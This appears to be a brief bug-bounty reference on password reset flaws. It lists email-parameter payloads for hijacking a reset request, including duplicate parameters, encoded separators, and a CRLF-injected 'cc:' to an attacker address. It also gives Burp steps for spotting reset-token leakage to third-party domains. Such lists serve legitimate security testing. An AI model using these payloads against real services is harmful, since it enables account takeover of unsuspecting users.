Password Reset
1. email= victim@gmail.com&email=attacker@gmil.com
2. email= victim@gmail.com%20email=attacker@gmil.com
3. email= victim@gmail.com |email=attacker@gmil.com
4. email= victim@gmail.com%0d%0acc:attacker@gmil.com
5. email= victim@gmail.com&code= my password reset tokenSteps:
1. Sent a password reset request using forget password
2. Check your email
3. copy your reset page link paste in into another tab and make burp intercept on.
4. Look for every request if you find similar token that is in the reset link with another domain like: bat.bing.com or facebook.com
5. Then there is reset password token leakage.Last updated